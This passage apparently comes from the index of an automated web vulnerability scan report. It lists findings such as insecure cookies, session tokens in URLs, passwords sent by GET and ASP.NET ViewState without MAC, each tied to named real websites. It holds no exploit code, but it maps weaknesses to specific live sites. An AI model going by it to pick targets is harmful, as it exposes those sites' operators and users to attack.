8.77. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 1]

8.78. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 2]

8.79. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 3]

8.80. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif [REST URL parameter 4]

8.81. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]

8.82. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]

8.83. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]

8.84. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]

8.85. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]

8.86. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]

8.87. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]

8.88. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]

8.89. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]

8.90. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]

8.91. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 1]

8.92. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 2]

8.93. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 3]

8.94. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 4]

8.95. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]

8.96. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]

8.97. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]

8.98. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]

8.99. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]

8.100. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]

8.101. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]

8.102. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 1]

8.103. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 2]

8.104. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 3]

8.105. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-663333-663333-17px.png [REST URL parameter 4]

8.106. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 1]

8.107. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 2]

8.108. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 3]

8.109. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-663333-17px.png [REST URL parameter 4]

8.110. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 1]

8.111. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 2]

8.112. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 3]

8.113. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-993333-993333-17px.png [REST URL parameter 4]

8.114. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 1]

8.115. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 2]

8.116. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 3]

8.117. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-663333-17px.png [REST URL parameter 4]

8.118. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 1]

8.119. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 2]

8.120. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 3]

8.121. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-993333-17px.png [REST URL parameter 4]

8.122. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 1]

8.123. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 2]

8.124. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 3]

8.125. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-cc3333-cc3333-17px.png [REST URL parameter 4]

8.126. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 1]

8.127. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 2]

8.128. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 3]

8.129. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-663333-17px.png [REST URL parameter 4]

8.130. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 1]

8.131. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 2]

8.132. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 3]

8.133. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-993333-17px.png [REST URL parameter 4]

8.134. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 1]

8.135. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 2]

8.136. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 3]

8.137. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-cc3333-17px.png [REST URL parameter 4]

8.138. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 1]

8.139. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 2]

8.140. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 3]

8.141. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff3333-ff3333-17px.png [REST URL parameter 4]

8.142. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 1]

8.143. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 2]

8.144. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 3]

8.145. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-663333-17px.png [REST URL parameter 4]

8.146. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 1]

8.147. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 2]

8.148. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 3]

8.149. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-cc3333-17px.png [REST URL parameter 4]

8.150. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 1]

8.151. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 2]

8.152. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 3]

8.153. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff3333-17px.png [REST URL parameter 4]

8.154. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 1]

8.155. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 2]

8.156. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 3]

8.157. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff6633-ff6633-17px.png [REST URL parameter 4]

8.158. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 1]

8.159. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 2]

8.160. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 3]

8.161. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 4]

8.162. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 1]

8.163. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 2]

8.164. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 3]

8.165. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 4]

8.166. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 1]

8.167. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 2]

8.168. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 3]

8.169. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 4]

8.170. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 1]

8.171. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 2]

8.172. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 3]

8.173. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 4]

8.174. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 1]

8.175. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 2]

8.176. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 3]

8.177. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff6633-17px.png [REST URL parameter 4]

8.178. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 1]

8.179. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 2]

8.180. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 3]

8.181. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff9933-17px.png [REST URL parameter 4]

8.182. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 1]

8.183. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 2]

8.184. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 3]

8.185. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-663333-17px.png [REST URL parameter 4]

8.186. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 1]

8.187. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 2]

8.188. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 3]

8.189. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff3333-17px.png [REST URL parameter 4]

8.190. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 1]

8.191. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 2]

8.192. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 3]

8.193. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff6633-17px.png [REST URL parameter 4]

8.194. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 1]

8.195. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 2]

8.196. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 3]

8.197. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ffcc00-ff9933-17px.png [REST URL parameter 4]

8.198. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 1]

8.199. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 2]

8.200. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/progressBar_all.gif [REST URL parameter 3]

8.201. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 1]

8.202. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 2]

8.203. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif [REST URL parameter 3]

8.204. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 1]

8.205. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 2]

8.206. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 3]

8.207. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-large-511.gif [REST URL parameter 4]

8.208. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 1]

8.209. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 2]

8.210. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 3]

8.211. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-1.gif [REST URL parameter 4]

8.212. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 1]

8.213. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 2]

8.214. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2.js [REST URL parameter 3]

8.215. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 1]

8.216. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 2]

8.217. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bg_bundle2gz.js [REST URL parameter 3]

8.218. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 1]

8.219. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 2]

8.220. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bingmap_bundlegz.js [REST URL parameter 3]

8.221. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 1]

8.222. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 2]

8.223. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/checkout_interstitial.js [REST URL parameter 3]

8.224. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]

8.225. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]

8.226. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]

8.227. http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]

8.228. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 1]

8.229. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 2]

8.230. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 3]

8.231. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 4]

8.232. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 5]

8.233. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 6]

8.234. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197048.png [REST URL parameter 7]

8.235. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 1]

8.236. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 2]

8.237. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 3]

8.238. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 4]

8.239. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 5]

8.240. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 6]

8.241. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154380y197049.png [REST URL parameter 7]

8.242. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 1]

8.243. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 2]

8.244. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 3]

8.245. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 4]

8.246. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 5]

8.247. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 6]

8.248. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197048.png [REST URL parameter 7]

8.249. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 1]

8.250. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 2]

8.251. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 3]

8.252. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 4]

8.253. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 5]

8.254. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 6]

8.255. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154381y197049.png [REST URL parameter 7]

8.256. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 1]

8.257. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 2]

8.258. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 3]

8.259. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 4]

8.260. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 5]

8.261. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 6]

8.262. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197048.png [REST URL parameter 7]

8.263. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 1]

8.264. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 2]

8.265. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 3]

8.266. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 4]

8.267. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 5]

8.268. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 6]

8.269. http://maps.f6img.com/images/venues/new-meadowlands-stadium/u2/v15/tiles/z19x154382y197049.png [REST URL parameter 7]

9. SSL cookie without secure flag set

9.1. https://signin.ebay.com/ws/eBayISAPI.dll

9.2. https://support.discoverbing.com/LTS/default.aspx

9.3. https://login.live.com/login.srf

9.4. https://ssl.bing.com/travel/secure/account/overview

9.5. https://support.discoverbing.com/Default.aspx

9.6. https://support.microsoft.com/oas/default.aspx

10. Session token in URL

10.1. http://api.brightcove.com/services/library

10.2. http://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log

10.3. http://digg.com/ajax/tooltip/submit

10.4. http://l.sharethis.com/pview

10.5. http://realnetworksrealarca.tt.omtrdc.net/m2/realnetworksrealarca/mbox/standard

10.6. http://sales.liveperson.net/hc/21661174/

10.7. http://stubhub.tt.omtrdc.net/m2/stubhub/mbox/standard

10.8. http://wd.sharethis.com/api/sharer.php

10.9. http://www.facebook.com/extern/login_status.php

11. Password field submitted using GET method

11.1. http://digg.com/submit

11.2. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

12. ASP.NET ViewState without MAC enabled

12.1. http://umfcluj.ro/

12.2. http://umfcluj.ro/Detaliu.aspx

12.3. http://umfcluj.ro/contact.aspx

12.4. http://umfcluj.ro/en

12.5. http://umfcluj.ro/fr

12.6. http://umfcluj.ro/lista.aspx

12.7. http://umfcluj.ro/search.aspx

12.8. http://umfcluj.ro/sitemap.aspx

12.9. http://www.cesal.ro/

12.10. http://www.netlogiq.ro/

12.11. http://www.netlogiq.ro/Portofoliu-Web-Design.html

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/statuses/user_timeline.json

13.2. http://bing.fansnap.com/checkout/ajax_verify_availability

13.3. http://bing.fansnap.com/checkout/clickout/415814268

13.4. http://bing.fansnap.com/checkout/clickout/418563179

13.5. http://bing.fansnap.com/checkout/index/415814268

13.6. http://bing.fansnap.com/checkout/index/418563179

13.7. http://bing.fansnap.com/la/pi

13.8. http://bing.fansnap.com/la/seats-uet

13.9. http://bing.fansnap.com/seats/ajax/get_row_data

13.10. http://bing.fansnap.com/seats/ajax/get_summary_data

13.11. http://bing.fansnap.com/seats/ajax/get_tickets_data

13.12. http://bing.fansnap.com/seats/ajax/get_vfs_data

13.13. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

13.14. http://c.microsoft.com/trans_pixel.aspx

13.15. https://signin.ebay.com/ws/eBayISAPI.dll

13.16. http://t.mookie1.com/t/v1/event

13.17. http://www.fansnap.com/

13.18. http://www.fansnap.com/developers

13.19. http://www.fansnap.com/la/pi

13.20. http://www.stubhub.com/

13.21. http://a.netmng.com/hic/

13.22. http://a.tribalfusion.com/j.ad

13.23. http://admeld.adnxs.com/usersync

13.24. http://admeld.lucidmedia.com/clicksense/admeld/match

13.25. http://ads.revsci.net/adserver/ako

13.26. http://adx.adnxs.com/mapuid

13.27. http://api.choicestream.com/instr/api/8e360375d27a5381/a1

13.28. http://b.scorecardresearch.com/b

13.29. http://b.scorecardresearch.com/p

13.30. http://b.scorecardresearch.com/r

13.31. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02

13.32. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr

13.33. http://bcp.crwdcntrl.net/4/c=73%7Crand=355761333%7Cpv=y%7Crt=ifr

13.34. http://bcp.crwdcntrl.net/4/c=73%7Crand=420299861%7Cpv=y%7Crt=ifr

